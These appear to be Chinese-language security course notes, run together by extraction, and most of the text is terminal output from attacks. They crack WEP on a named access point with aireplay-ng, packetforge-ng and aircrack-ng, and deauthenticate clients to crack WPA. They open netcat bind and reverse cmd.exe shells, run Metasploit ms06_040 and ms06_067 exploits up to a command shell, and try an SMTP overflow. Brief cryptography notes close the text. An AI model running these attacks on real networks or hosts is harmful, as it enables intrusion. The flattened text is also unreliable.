1、1、creative idea Hacker CIA-信息安全概念Confidentality:保密性Top secret /secret /confidential / pulic or classifiedSniffer:攻击技术 加密:防御技术Intergirty:完整性 HashAvailability :可用性Controllability:可控性 mtd Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-
2、m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of pa
3、ckets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o n
4、pckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack opt
5、ions:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can still be used):-deauth count : deauthenticate 1 or all stations (-0)-fakeauth delay : fake authentication with AP (-1)-interactive :
6、 interactive frame selection (-2)-arpreplay : standard ARP-request replay (-3)-chopchop : decrypt/chopchop WEP packet (-4)-fragment : generates valid keystream (-5)-caffe-latte : query a client for new IVs (-6)-cfrag : fragments against a client (-7)-test : tests injection and quality (-9)-help : Di
7、splays this usage screenNo replay interface specified.bt # ifconfig -a eth0 Link encap:Ethernet HWaddr 00:0C:29:4A:BF:A9 inet addr:172.19.1.200 Bcast:172.19.255.255 Mask:255.255.0.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:3475 errors:0 dropped:0 overruns:0 frame:0TX packets:4434 er
8、rors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:292204 (285.3 KiB) TX bytes:3357741 (3.2 MiB)Interrupt:16 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 fra
9、me:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)wlan0 Link encap:UNSPEC HWaddr 00-C0-CA-1E-E2-B4-00-00-00-00-00-00-00-00-00-00 UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1RX packets:8840 errors:0 dropped:0 o
10、verruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:1233831 (1.1 MiB) TX bytes:0 (0.0 b)bt # aireplay-ng -1 0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:31:37 Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 103:31:37 Sendin
11、g Authentication Request (Open System) ACK03:31:37 Authentication successful03:31:37 Sending Association Request ACK03:31:37 Association successful :-) (AID: 1)bt # aireplay-ng Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas dOtreppeOriginal work: Christophe Devinehttp:/www.aircrack-ng.orgusag
12、e: aireplay-ng Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f f
13、romds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g valu
14、e : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack options:-j : inject F
15、romDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes (Numbers can st
16、ill be used):-deauth count : deauthenticate 1 or all stations (-0)-fakeauth delay : fake authentication with AP (-1)-interactive : interactive frame selection (-2)-arpreplay : standard ARP-request replay (-3)-chopchop : decrypt/chopchop WEP packet (-4)-fragment : generates valid keystream (-5)-caffe
17、-latte : query a client for new IVs (-6)-cfrag : fragments against a client (-7)-test : tests injection and quality (-9)-help : Displays this usage screenNo replay interface specified.bt # aireplay-ng -5 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan003:33:40 Waiting for beacon frame (BSSID: 00:1F:3
18、3:D3:7C:F4) on channel 103:33:40 Waiting for a data packet.Read 210 packets.Size: 107, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = 00:1F:33:D3:7C:F4Source MAC = 00:0C:F1:21:5E:EB0x0000: 0841 d500 001f 33d3 7cf4 000c f121 5eeb .A3.|!.0x0010: 001f 33d3 7cf4 0039 1c24 f400 9af4 0dbb 3.
19、|9.$0x0020: 0ca8 ebf1 e460 1a05 fb96 943f d1e5 819d .?0x0030: a7bb 241b 3db4 517a 935d 82e6 d851 beca $.=.Qz.Q0x0040: 7257 d1f2 e17d 4715 6116 90cf 83cd d987 rW.G.a.0x0050: 772f 6675 26d6 76d6 99f1 08d8 b8ec c13e w/fu&.v0x0060: e495 2a0a c933 90d9 4330 e3 *3C0.Use this packet ? ySaving chosen packet
20、 in replay_src-1207-033342.cap03:33:48 Data packet found!03:33:48 Sending fragmented packet03:33:48 Got RELAYED packet!03:33:48 Trying to get 384 bytes of a keystream03:33:48 Got RELAYED packet!03:33:48 Trying to get 1500 bytes of a keystream03:33:48 Got RELAYED packet!Saving keystream in fragment-1
21、207-033348.xorNow you can build a packet with packetforge-ng out of that 1500 bytes keystreambt # packetforge-ng Packetforge-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas dOtreppeOriginal work: Christophe Devine and Martin Beckhttp:/www.aircrack-ng.orgUsage: packetforge-ng Forge options:-p : set fram
22、e control word (hex)-a : set Access Point MAC address-c : set Destination MAC address-h : set Source MAC address-j : set FromDS bit-o : clear ToDS bit-e : disables WEP encryption-k : set Destination IP Port-l : set Source IP Port-t ttl : set Time To Live-w : write packet to this pcap file-s : specif
23、y size of null packet-n : set number of packets to generateSource options:-r : read packet from this raw file-y : read PRGA from this fileModes:-arp : forge an ARP packet (-0)-udp : forge an UDP packet (-1)-icmp : forge an ICMP packet (-2)-null : build a null packet (-3)-custom : build a custom pack
24、et (-9)-help : Displays this usage screenPlease specify a mode.bt # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/frfragment-1020-130603.xor fragment-1108-025108.xor fragment-1130-070213.xorfragment-1028-071313.xor fragment-1112-081947.xor
25、 fragment-1206-053848.xorfragment-1028-084211.xor fragment-1125-061640.xor fragment-1207-033348.xorbt # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -r taiyuanarp wlan0open failed: No such file or directorybt # pa
26、cketforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -w taiyuanarp wlan0Wrote packet to: taiyuanarpbt # aireplay-ng Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas dOtreppeOriginal work: Christophe Devinehttp:/www.air
27、crack-ng.orgusage: aireplay-ng Filter options:-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame contro
28、l, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detectionReplay options:-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MA
29、C address-g value : change ring buffer size (default: 8)-F : choose first matching packetFakeauth attack options:-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key authArp Replay attack optio
30、ns:-j : inject FromDS packetsFragmentation attack options:-k IP : set destination IP in fragments-l IP : set source IP in fragmentsTest attack options:-B : activates the bitrate testsource options:-i iface : capture packets from this interface-r file : extract packets from this pcap fileattack modes
31、 (Numbers can still be used):-deauth count : deauthenticate 1 or all stations (-0)-fakeauth delay : fake authentication with AP (-1)-interactive : interactive frame selection (-2)-arpreplay : standard ARP-request replay (-3)-chopchop : decrypt/chopchop WEP packet (-4)-fragment : generates valid keys
32、tream (-5)-caffe-latte : query a client for new IVs (-6)-cfrag : fragments against a client (-7)-test : tests injection and quality (-9)-help : Displays this usage screenNo replay interface specified.bt # aireplay-ng -2 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 No replay interface specified.“airepla
33、y-ng -help“ for help.bt # aireplay-ng -2 -x 1024 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -r /root/taiyuanarp wlan0 Size: 68, FromDS: 0, ToDS: 1 (WEP)BSSID = 00:1F:33:D3:7C:F4Dest. MAC = FF:FF:FF:FF:FF:FFSource MAC = 00:C0:CA:1E:E2:B40x0000: 0841 0201 001f 33d3 7cf4 00c0 ca1e e2b4 .A3.|.0x0010: fff
34、f ffff ffff 8001 8268 cb00 f50e 9369 .h.i0x0020: b050 8f87 9697 48ad 5237 d0de ad4b 0d4f .PH.R7.K.O0x0030: 4f31 d217 feb0 2b52 b1a3 b8fa a535 9bca O1+R.50x0040: b3ac a461 .aUse this packet ? ySaving chosen packet in replay_src-1207-033730.capYou should also start airodump-ng to capture replies.End o
35、f file.bt # bt taiyuan # aircrack-ng *.ivs Opening taiyuan-01.ivsRead 9753 packets.# BSSID ESSID Encryption1 00:1F:33:D3:7C:F4 sony WEP (9751 IVs)2 00:60:B3:33:7C:01 Shanxi University Wireless UnknownIndex number of target network ? 1Opening taiyuan-01.ivsAttack will be restarted every 5000 captured
36、 ivs.Starting PTW attack with 10666 ivs.破解 wpa aireplay-ng -0 5 -a 00:1f:33:d3:7c:f4 -c 00-1B-77-11-1D-11 wlan0aircrack-ng *.ivs -w /root/wordlist.txt (hash 彩虹表)/需要抓到一次完整的四次 handshake 才可以缓冲区溢出 1、在 a 主机上 nc.exe -l -p 8000 在 b 主机 telnet ip_a 8000 2、在 a 主机上 nc.exe -l -p 9000 -t -e c:windowssystem32cmd.
37、exe 。在 b 上 telnet ip_a 90003、在 a 上 nc.exe -l -p 10000 在 b 上 nc.exe -t -e c:windowssystem32cmd.exe ip_a 10000Shellcode:一段用来夺权相应权限代码show exploits use netapi_ms06_040show options set RHOST 172.19.1.236set PAYLOAD win32_bind /如果选择 set PAYLOAD win32_reverse 则必须有参数Set LHOST 攻击主机地址exploit msf use windows/b
38、rowser/ms06_067_keyframemsf exploit(ms06_067_keyframe) show options Module options:Name Current Setting Required Description - - - - SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default
39、 is random) Exploit target:Id Name - - 0 Windows 2000/XP/2003 Universal msf exploit(ms06_067_keyframe) set SRVHOST 172.19.1.200SRVHOST = 172.19.1.200msf exploit(ms06_067_keyframe) set URIPATH adminURIPATH = adminmsf exploit(ms06_067_keyframe) show options Module options:Name Current Setting Required
40、 Description - - - - SRVHOST 172.19.1.200 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH admin no The URI to use for this exploit (default is random) Exploit target:Id Name - - 0 Windows 2000/XP/2003 Universal msf exploit(ms06_067_keyframe
41、) exploit - Exploit failed: A payload has not been selected.msf exploit(ms06_067_keyframe) set PAYLOAD windows/shellset PAYLOAD windows/shell/bind_tcp set PAYLOAD windows/shell_bind_tcpset PAYLOAD windows/shell/reverse_http set PAYLOAD windows/shell_bind_tcp_xpfwset PAYLOAD windows/shell/reverse_ord
42、_tcp set PAYLOAD windows/shell_reverse_tcpset PAYLOAD windows/shell/reverse_tcp msf exploit(ms06_067_keyframe) set PAYLOAD windows/shell/bind_tcp PAYLOAD = windows/shell/bind_tcpmsf exploit(ms06_067_keyframe) show options Module options:Name Current Setting Required Description - - - - SRVHOST 172.1
43、9.1.200 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH admin no The URI to use for this exploit (default is random) Payload options:Name Current Setting Required Description - - - - EXITFUNC process yes Exit technique: seh, thread, process
44、 LPORT 4444 yes The local port Exploit target:Id Name - - 0 Windows 2000/XP/2003 Universal msf exploit(ms06_067_keyframe) exploit * Using URL: http:/172.19.1.200:8080/admin* Server started.msf exploit(ms06_067_keyframe) * Sending exploit to 172.19.1.214:3011.* Started bind handler* Sending stage (47
45、4 bytes)* Command shell session 2 opDos (deny of service)cmdTelnet Set localechoQuitTelnet 172.19.1.214 25HeloHelpMail from:Rcpt to:DataAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.加密、解密技术Shannon confusion & diffusion 混淆与扩散1、密钥是成对使用的2、公钥加密、私钥解密3、私钥签名、公钥验证Man in the middle attack:中间人攻击生日攻击:如果相同的密钥加密不同数据,安全
46、有问题Rsa:既可以加密解密,也可以签名验证Dsa: 只能做数字签名DH: 既不可以用与加解密,也不可用做签名验证,用于密钥协商12345 827CCB0EEA8A706C4C34A16891F84E7B12344 D10906C3DAC1172D4F60BD41F224AE75Ssl: Secure socket layer(安全套接层) https:443建立 https 的试验1、建立 ca 机构2、服务器申请证书3、certsrv 证书服务器去提交申请4、ca 证书颁发机构受到申请后,验证并颁发5、到处证书,安装服务器(iis)证书应用层 Ssl-传输层 VPN -用 arp&ip spoofing
